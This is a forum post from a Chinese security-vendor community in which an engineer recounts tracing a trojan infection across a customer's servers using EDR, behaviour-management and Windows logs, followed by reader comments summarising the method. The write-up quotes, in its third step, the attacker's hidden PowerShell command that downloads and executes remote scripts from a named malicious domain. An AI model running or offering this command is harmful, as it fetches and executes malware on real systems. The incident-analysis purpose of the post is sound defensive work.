小明偷学 发表于 2024-5-22 18:39
  
非常好的实践教程,谢谢分享
新手537797 发表于 2024-7-20 10:54
  
打卡学习,感谢大佬分享!
ppg 发表于 2024-7-25 11:14
  
明确问题
        服务器存在木马病毒
客户诉求
        分析中毒过程
排查步骤
        1、确认中毒时间:查看病毒防护记录,找到病毒文件夹最后一次写时间
        2、检查EDR配置:病毒被信任,配置存疑
        3、查日志:浏览器下载日志、EDR安全日志(第1步应该就看过了),分析日志寻找蛛丝马迹,发现可疑站点
        4、对可疑站点溯源
        5、对木马进程溯源:从安全日志中获得进程名称,发现可疑地址,该中毒机器可能被控制
        6、联动查询:在其他安全设备上查询此可疑地址,确定影响范围,确定第一台中毒机器
        7、采取封堵动作:对可疑的url、端口、ip做封堵
        8、分析首台中毒机器:检查EDR防护为什么失效、查日志、查计划任务
总结
        首先确定问题和客户诉求,这点很重要
        排查过程总结
                1、明确边界:明确中毒时间、明确第一台中毒主机
                2、排查手段:查日志(安全设备的日志、远程桌面日志、系统事件日志)、查配置(配置是否正确,防护为何失效)、查计划任务、查进程和连接情况
                3、头脑风暴:查到的信息多而杂,需要逐条分析、交叉关联分析、假设分析,逐渐清晰攻击过程
                4、安全工具:whois、地址查询、进程查询等(代码分析可以找ai帮忙)
新手537797 发表于 2024-7-29 10:54
  
打卡学习,感谢大佬分享!
#原创分享#一次不成功的木马病毒溯源
  

青岛彭于晏 3069817人觉得有帮助

{{ttag.title}}
一:项目背景
2021-3-19,客户反映内网服务器中木马,事情从服务器不能提供服务开始,随即发现多台服务器内存在木马病毒
二:客户诉求
中木马的时间以及中毒途径
三:溯源过程
1、从发现的第一台服务器(IP为222)着手开始调查,病毒已被杀毒软件隔离,查看病毒路径,首先查看文件夹写入时间(时间为此文件夹最后一次写的时间,文件夹内也没有别的文件)时间为3-16-11:11,基本可以确定中毒时间为3月16日11:11。
2、服务器安装了EDR软件,为什么没有作为,查看EDR的日志,吓一跳,病毒在运行时已被EDR检测,还被信任了,此时必有蹊跷,如果我没有记错的话,EDR文件实时防护检测的病毒可以忽略、隔离、信任,啥都不点应该是未处置。由此我推断这个操作是由远程桌面进行操作的,运行木马时点击信任。
3、查看浏览器以及下载软件是否有下载记录(答案是无),查看EDR的无文件攻击日志,巧妙的发现了执行了一些命令。具体看不懂,但是可以确定的是访问sec.xiaoshabi.nl了,猜测病毒是由这个网站传播。
powershell.exe  -NoP -NonI -W Hidden "if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/networks.ps1')}else{IEX(New-Object Net.WebClient).DownloadString('http://sec.xiaoshabi.nl:80/netstat.ps1')}"
4、whois一波,额并没有任何有用的信息,站长工具查询此域名也没有任何信息,只有一个A记录,而且IP是香港IP。
5、截止到目前未发现木马做了什么,一般面上看不出啥东西的木马,一定在后台隐藏着什么,知道了程序名查看下进程
,tasklist -v |find “msdtc”   然后根据查到的PID反查网络连接,程序去连接了一个IP地址.且状态为ESTABLISHED,IP可使用baidu查询,结果是个德国的IP,理论上讲客户并没有此类业务,该机器的状态很有可能被控制。


6、知道了病毒下载途径以及病毒连接的地址,去行为管理查日志,查询日志为3-16开始访问sec.xiaoshabi.nl的ip。查到了10+台,最早访问的IP是168,有些严重,先把网站封了再说,使用自定义URL和端口控制封堵对其访问,。
7、现在分析远程桌面,还是查日志,查远程桌面登录日志,筛选中毒前时间的登录日志,筛选结果为空。查看安全日志,发现中毒前有审核成功的日志,发现流程为222<20<168,168是最早下载木马的机器,与AC日志吻合,再查168的日志,远程桌面日志也没有,登录审核日志也没有了,截止到现在已经无路可查了。
8、168机器还发现有趣的问题,EDR不知被何人在2021年1月13日设置了全盘信任,相关日志也没有。有可能是被故意删除了。其次发现一计划任务,每隔5分钟会执行一次powershell,本次的访问的域名为pastebin.com,解析地址为么美国,确认无相关此业务。
9、查找相关计划任务,直接删除。

溯源到此结束,有可能有分析不对的地方,见谅,知识库储备中。。。

打赏鼓励作者,期待更多好文!

打赏
92人已打赏

发表新帖
热门标签
全部标签>
安全效果
西北区每日一问
技术盲盒
干货满满
【 社区to talk】
技术笔记
每日一问
信服课堂视频
GIF动图学习
新版本体验
技术咨询
2023技术争霸赛专题
功能体验
产品连连看
安装部署配置
通用技术
秒懂零信任
技术晨报
自助服务平台操作指引
原创分享
标准化排查
排障笔记本
玩转零信任
排障那些事
SDP百科
深信服技术支持平台
升级&主动服务
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
高频问题集锦
社区新周刊
POC测试案例
全能先锋系列
云化安全能力

本版版主

217
288
151

发帖

粉丝

关注

7
20
6

发帖

粉丝

关注

本版达人

新手61940...

本周建议达人

二进制网络

本周分享达人